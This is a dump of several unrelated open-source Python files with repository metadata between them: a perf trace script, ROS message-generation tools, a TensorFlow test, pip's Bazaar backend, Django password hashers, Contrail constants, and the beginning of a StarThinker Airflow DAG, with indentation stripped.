'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
|
gpl-2.0
|
APM602/APM602
|
mk/PX4/Tools/genmsg/src/genmsg/template_tools.py
|
215
|
9443
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
## ROS Message generatation
##
##
import sys
import os
import em
import genmsg.command_line
import genmsg.msgs
import genmsg.msg_loader
import genmsg.gentools
# generate msg or srv files from a template file
# template_map of the form { 'template_file':'output_file'} output_file can contain @NAME@ which will be replaced by the message/service name
def _generate_from_spec(input_file, output_dir, template_dir, msg_context, spec, template_map, search_path):
md5sum = genmsg.gentools.compute_md5(msg_context, spec)
# precompute msg definition once
if isinstance(spec, genmsg.msgs.MsgSpec):
msg_definition = genmsg.gentools.compute_full_text(msg_context, spec)
# Loop over all files to generate
for template_file_name, output_file_name in template_map.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name.replace("@NAME@", spec.short_name))
#print "generate_from_template %s %s %s" % (input_file, template_file, output_file)
ofile = open(output_file, 'w') #todo try
# Set dictionary for the generator interpreter
g = {
"file_name_in": input_file,
"spec": spec,
"md5sum": md5sum,
"search_path": search_path,
"msg_context": msg_context
}
if isinstance(spec, genmsg.msgs.MsgSpec):
g['msg_definition'] = msg_definition
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, globals=g, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
def _generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict):
# Read MsgSpec from .msg file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_msg_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent msg file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
msg_template_dict,
search_path)
def _generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict):
# Read MsgSpec from .srv.file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_srv_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent srv file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
srv_template_dict,
search_path)
# Generate the language dependent msg file for the srv request
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.request,
msg_template_dict,
search_path)
# Generate the language dependent msg file for the srv response
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.response,
msg_template_dict,
search_path)
# uniform interface for genering either srv or msg files
def generate_from_file(input_file, package_name, output_dir, template_dir, include_path, msg_template_dict, srv_template_dict):
# Normalize paths
input_file = os.path.abspath(input_file)
output_dir = os.path.abspath(output_dir)
# Create output dir
try:
os.makedirs(output_dir)
except OSError as e:
if e.errno != 17: # ignore file exists error
raise
# Parse include path dictionary
if( include_path ):
search_path = genmsg.command_line.includepath_to_dict(include_path)
else:
search_path = {}
# Generate the file(s)
if input_file.endswith(".msg"):
_generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict)
elif input_file.endswith(".srv"):
_generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict)
else:
assert False, "Uknown file extension for %s"%input_file
def generate_module(package_name, output_dir, template_dir, template_dict):
# Locate generate msg files
files = os.listdir(output_dir)
# Loop over all files to generate
for template_file_name, output_file_name in template_dict.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name)
ofile = open(output_file, 'w') #todo try
# Set dictionary for the generator intepreter
g = dict(files=files,
package=package_name)
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
interpreter.updateGlobals(g)
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
# Uniform interface to support the standard command line options
def generate_from_command_line_options(argv, msg_template_dict, srv_template_dict, module_template_dict = {}):
from optparse import OptionParser
parser = OptionParser("[options] <srv file>")
parser.add_option("-p", dest='package',
help="ros package the generated msg/srv files belongs to")
parser.add_option("-o", dest='outdir',
help="directory in which to place output files")
parser.add_option("-I", dest='includepath',
help="include path to search for messages",
action="append")
parser.add_option("-m", dest='module',
help="write the module file",
action='store_true', default=False)
parser.add_option("-e", dest='emdir',
help="directory containing template files",
default=sys.path[0])
(options, argv) = parser.parse_args(argv)
if( not options.package or not options.outdir or not options.emdir):
parser.print_help()
exit(-1)
if( options.module ):
generate_module(options.package, options.outdir, options.emdir, module_template_dict)
else:
if len(argv) > 1:
generate_from_file(argv[1], options.package, options.outdir, options.emdir, options.includepath, msg_template_dict, srv_template_dict)
else:
parser.print_help()
exit(-1)
|
gpl-3.0
|
ville-k/tensorflow
|
tensorflow/python/kernel_tests/string_join_op_test.py
|
134
|
1896
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for string_join_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
class StringJoinOpTest(test.TestCase):
def testStringJoin(self):
input0 = ["a", "b"]
input1 = "a"
input2 = [["b"], ["c"]]
with self.test_session():
output = string_ops.string_join([input0, input1])
self.assertAllEqual(output.eval(), [b"aa", b"ba"])
output = string_ops.string_join([input0, input1], separator="--")
self.assertAllEqual(output.eval(), [b"a--a", b"b--a"])
output = string_ops.string_join([input0, input1, input0], separator="--")
self.assertAllEqual(output.eval(), [b"a--a--a", b"b--a--b"])
output = string_ops.string_join([input1] * 4, separator="!")
self.assertEqual(output.eval(), b"a!a!a!a")
output = string_ops.string_join([input2] * 2, separator="")
self.assertAllEqual(output.eval(), [[b"bb"], [b"cc"]])
with self.assertRaises(ValueError): # Inconsistent shapes
string_ops.string_join([input0, input2]).eval()
if __name__ == "__main__":
test.main()
|
apache-2.0
|
brandonium21/snowflake
|
snowflakeEnv/lib/python2.7/site-packages/pip/vcs/bazaar.py
|
280
|
4427
|
from __future__ import absolute_import
import logging
import os
import tempfile
import re
# TODO: Get this into six.moves.urllib.parse
try:
from urllib import parse as urllib_parse
except ImportError:
import urlparse as urllib_parse
from pip.utils import rmtree, display_path
from pip.vcs import vcs, VersionControl
from pip.download import path_to_url
logger = logging.getLogger(__name__)
class Bazaar(VersionControl):
name = 'bzr'
dirname = '.bzr'
repo_name = 'branch'
schemes = (
'bzr', 'bzr+http', 'bzr+https', 'bzr+ssh', 'bzr+sftp', 'bzr+ftp',
'bzr+lp',
)
def __init__(self, url=None, *args, **kwargs):
super(Bazaar, self).__init__(url, *args, **kwargs)
# Python >= 2.7.4, 3.3 doesn't have uses_fragment or non_hierarchical
# Register lp but do not expose as a scheme to support bzr+lp.
if getattr(urllib_parse, 'uses_fragment', None):
urllib_parse.uses_fragment.extend(['lp'])
urllib_parse.non_hierarchical.extend(['lp'])
def export(self, location):
"""
Export the Bazaar repository at the url to the destination location
"""
temp_dir = tempfile.mkdtemp('-export', 'pip-')
self.unpack(temp_dir)
if os.path.exists(location):
# Remove the location to make sure Bazaar can export it correctly
rmtree(location)
try:
self.run_command(['export', location], cwd=temp_dir,
show_stdout=False)
finally:
rmtree(temp_dir)
def switch(self, dest, url, rev_options):
self.run_command(['switch', url], cwd=dest)
def update(self, dest, rev_options):
self.run_command(['pull', '-q'] + rev_options, cwd=dest)
def obtain(self, dest):
url, rev = self.get_url_rev()
if rev:
rev_options = ['-r', rev]
rev_display = ' (to revision %s)' % rev
else:
rev_options = []
rev_display = ''
if self.check_destination(dest, url, rev_options, rev_display):
logger.info(
'Checking out %s%s to %s',
url,
rev_display,
display_path(dest),
)
self.run_command(['branch', '-q'] + rev_options + [url, dest])
def get_url_rev(self):
# hotfix the URL scheme after removing bzr+ from bzr+ssh:// readd it
url, rev = super(Bazaar, self).get_url_rev()
if url.startswith('ssh://'):
url = 'bzr+' + url
return url, rev
def get_url(self, location):
urls = self.run_command(['info'], show_stdout=False, cwd=location)
for line in urls.splitlines():
line = line.strip()
for x in ('checkout of branch: ',
'parent branch: '):
if line.startswith(x):
repo = line.split(x)[1]
if self._is_local_repository(repo):
return path_to_url(repo)
return repo
return None
def get_revision(self, location):
revision = self.run_command(
['revno'], show_stdout=False, cwd=location)
return revision.splitlines()[-1]
def get_tag_revs(self, location):
tags = self.run_command(
['tags'], show_stdout=False, cwd=location)
tag_revs = []
for line in tags.splitlines():
tags_match = re.search(r'([.\w-]+)\s*(.*)$', line)
if tags_match:
tag = tags_match.group(1)
rev = tags_match.group(2)
tag_revs.append((rev.strip(), tag.strip()))
return dict(tag_revs)
def get_src_requirement(self, dist, location, find_tags):
repo = self.get_url(location)
if not repo:
return None
if not repo.lower().startswith('bzr:'):
repo = 'bzr+' + repo
egg_project_name = dist.egg_name().split('-', 1)[0]
current_rev = self.get_revision(location)
tag_revs = self.get_tag_revs(location)
if current_rev in tag_revs:
# It's a tag
full_egg_name = '%s-%s' % (egg_project_name, tag_revs[current_rev])
else:
full_egg_name = '%s-dev_r%s' % (dist.egg_name(), current_rev)
return '%s@%s#egg=%s' % (repo, current_rev, full_egg_name)
vcs.register(Bazaar)
|
bsd-2-clause
|
etuna-SBF-kog/Stadsparken
|
env/lib/python2.7/site-packages/django/contrib/auth/hashers.py
|
2
|
15500
|
import functools
import hashlib
from django.conf import settings
from django.utils import importlib
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_str
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import (
pbkdf2, constant_time_compare, get_random_string)
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD = '!' # This will never be a valid encoded hash
MAXIMUM_PASSWORD_LENGTH = 4096 # The maximum length a password can be to prevent DoS
HASHERS = None # lazily loaded from PASSWORD_HASHERS
PREFERRED_HASHER = None # defaults to first item in PASSWORD_HASHERS
def password_max_length(max_length):
def inner(fn):
@functools.wraps(fn)
def wrapper(self, password, *args, **kwargs):
if len(password) > max_length:
raise ValueError("Invalid password; Must be less than or equal"
" to %d bytes" % max_length)
return fn(self, password, *args, **kwargs)
return wrapper
return inner
def is_password_usable(encoded):
return (encoded is not None and encoded != UNUSABLE_PASSWORD)
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if not password or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
raw_password = password
password = smart_str(password)
encoded = smart_str(encoded)
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
hasher = get_hasher('unsalted_md5')
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
hasher = get_hasher('unsalted_sha1')
else:
algorithm = encoded.split('$', 1)[0]
hasher = get_hasher(algorithm)
must_update = hasher.algorithm != preferred.algorithm
is_correct = hasher.verify(password, encoded)
if setter and is_correct and must_update:
setter(raw_password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt. If
password is None or blank then UNUSABLE_PASSWORD will be
returned which disallows logins.
"""
if not password:
return UNUSABLE_PASSWORD
hasher = get_hasher(hasher)
password = smart_str(password)
if not salt:
salt = hasher.salt()
salt = smart_str(salt)
return hasher.encode(password, salt)
def load_hashers(password_hashers=None):
global HASHERS
global PREFERRED_HASHER
hashers = []
if not password_hashers:
password_hashers = settings.PASSWORD_HASHERS
for backend in password_hashers:
try:
mod_path, cls_name = backend.rsplit('.', 1)
mod = importlib.import_module(mod_path)
hasher_cls = getattr(mod, cls_name)
except (AttributeError, ImportError, ValueError):
raise ImproperlyConfigured("hasher not found: %s" % backend)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % backend)
hashers.append(hasher)
HASHERS = dict([(hasher.algorithm, hasher) for hasher in hashers])
PREFERRED_HASHER = hashers[0]
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
if PREFERRED_HASHER is None:
load_hashers()
return PREFERRED_HASHER
else:
if HASHERS is None:
load_hashers()
if algorithm not in HASHERS:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
return HASHERS[algorithm]
def mask_hash(hash, show=6, char="*"):
"""
Returns the given hash, with only the first ``show`` number shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
name = mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError:
raise ValueError("Couldn't load %s password algorithm "
"library" % name)
return module
raise ValueError("Hasher '%s' doesn't specify a library attribute" %
self.__class__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ascii
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError()
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError()
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError()
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256 with 10000 iterations.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 10000
digest = hashlib.sha256
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt, iterations=None):
assert password
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = hash.encode('base64').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class BCryptPasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the py-bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt"
library = ("py-bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
bcrypt = self._load_library()
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, data)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
bcrypt = self._load_library()
return constant_time_compare(data, bcrypt.hashpw(password, data))
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return SortedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert password
assert salt and '$' not in salt
hash = hashlib.sha1(salt + password).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert password
assert salt and '$' not in salt
hash = hashlib.md5(salt + password).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert salt == ''
hash = hashlib.sha1(password).hexdigest()
return 'sha1$$%s' % hash
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return SortedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(password).hexdigest()
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return SortedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(password, salt)
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
@password_max_length(MAXIMUM_PASSWORD_LENGTH)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(password, data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return SortedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
|
gpl-3.0
|
srajag/contrail-controller
|
src/config/common/svc_info.py
|
9
|
2236
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
_MGMT_STR = "management"
_LEFT_STR = "left"
_RIGHT_STR = "right"
_SVC_VN_MGMT = "svc-vn-mgmt"
_SVC_VN_LEFT = "svc-vn-left"
_SVC_VN_RIGHT = "svc-vn-right"
_VN_MGMT_SUBNET_CIDR = '10.250.1.0/24'
_VN_LEFT_SUBNET_CIDR = '10.250.2.0/24'
_VN_RIGHT_SUBNET_CIDR = '10.250.3.0/24'
_VN_SNAT_PREFIX_NAME = 'snat-si-left'
_VN_SNAT_SUBNET_CIDR = '100.64.0.0/29'
_CHECK_SVC_VM_HEALTH_INTERVAL = 30
_VM_INSTANCE_TYPE = 'virtual-machine'
_NETNS_INSTANCE_TYPE = 'network-namespace'
_SNAT_SVC_TYPE = 'source-nat'
_LB_SVC_TYPE = 'loadbalancer'
_ACTIVE_LOCAL_PREFERENCE = 200
_STANDBY_LOCAL_PREFERENCE = 100
# Version from the vrouter agent can manage service instances
_VROUTER_NETNS_SUPPORTED_VERSION = '1.10'
def get_management_if_str():
return _MGMT_STR
def get_left_if_str():
return _LEFT_STR
def get_right_if_str():
return _RIGHT_STR
def get_if_str_list():
if_str_list = []
if_str_list.append(get_management_if_str())
if_str_list.append(get_left_if_str())
if_str_list.append(get_right_if_str())
return if_str_list
def get_management_vn_name():
return _SVC_VN_MGMT
def get_left_vn_name():
return _SVC_VN_LEFT
def get_right_vn_name():
return _SVC_VN_RIGHT
def get_shared_vn_list():
shared_vn_list = []
shared_vn_list.append(get_management_vn_name())
shared_vn_list.append(get_left_vn_name())
shared_vn_list.append(get_right_vn_name())
return shared_vn_list
def get_management_vn_subnet():
return _VN_MGMT_SUBNET_CIDR
def get_left_vn_subnet():
return _VN_LEFT_SUBNET_CIDR
def get_right_vn_subnet():
return _VN_RIGHT_SUBNET_CIDR
def get_snat_left_vn_prefix():
return _VN_SNAT_PREFIX_NAME
def get_snat_left_subnet():
return _VN_SNAT_SUBNET_CIDR
def get_vm_instance_type():
return _VM_INSTANCE_TYPE
def get_netns_instance_type():
return _NETNS_INSTANCE_TYPE
def get_snat_service_type():
return _SNAT_SVC_TYPE
def get_lb_service_type():
return _LB_SVC_TYPE
def get_vm_health_interval():
return _CHECK_SVC_VM_HEALTH_INTERVAL
def get_active_preference():
return _ACTIVE_LOCAL_PREFERENCE
def get_standby_preference():
return _STANDBY_LOCAL_PREFERENCE
|
apache-2.0
|
google/starthinker
|
dags/sheets_copy_dag.py
|
1
|
4462
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
--------------------------------------------------------------
Before running this Airflow module...
Install StarThinker in cloud composer ( recommended ):
From Release: pip install starthinker
From Open Source: pip install git+https://github.com/google/starthinker
Or push local code to the cloud composer plugins directory ( if pushing local code changes ):
source install/deploy.sh
4) Composer Menu
l) Install All
--------------------------------------------------------------
If any recipe task has "auth" set to "user" add user credentials:
1. Ensure an RECIPE['setup']['auth']['user'] = [User Credentials JSON]
OR
1. Visit Airflow UI > Admin > Connections.
2. Add an Entry called "starthinker_user", fill in the following fields. Last step paste JSON from authentication.
- Conn Type: Google Cloud Platform
- Project: Get from https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md
- Keyfile JSON: Get from: https://github.com/google/starthinker/blob/master/tutorials/deploy_commandline.md#optional-setup-user-credentials
--------------------------------------------------------------
If any recipe task has "auth" set to "service" add service credentials:
1. Ensure an RECIPE['setup']['auth']['service'] = [Service Credentials JSON]
OR
1. Visit Airflow UI > Admin > Connections.
2. Add an Entry called "starthinker_service", fill in the following fields. Last step paste JSON from authentication.
- Conn Type: Google Cloud Platform
- Project: Get from https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md
- Keyfile JSON: Get from: https://github.com/google/starthinker/blob/master/tutorials/cloud_service.md
--------------------------------------------------------------
Sheet Copy
Copy tab from a sheet to a sheet.
- Provide the full edit URL for both sheets.
- Provide the tab name for both sheets.
- The tab will only be copied if it does not already exist.
--------------------------------------------------------------
This StarThinker DAG can be extended with any additional tasks from the following sources:
- https://google.github.io/starthinker/
- https://github.com/google/starthinker/tree/master/dags
'''
from starthinker.airflow.factory import DAG_Factory
INPUTS = {
'auth_read': 'user', # Credentials used for reading data.
'from_sheet': '',
'from_tab': '',
'to_sheet': '',
'to_tab': '',
}
RECIPE = {
'tasks': [
{
'sheets': {
'auth': {
'field': {
'name': 'auth_read',
'kind': 'authentication',
'order': 1,
'default': 'user',
'description': 'Credentials used for reading data.'
}
},
'template': {
'sheet': {
'field': {
'name': 'from_sheet',
'kind': 'string',
'order': 1,
'default': ''
}
},
'tab': {
'field': {
'name': 'from_tab',
'kind': 'string',
'order': 2,
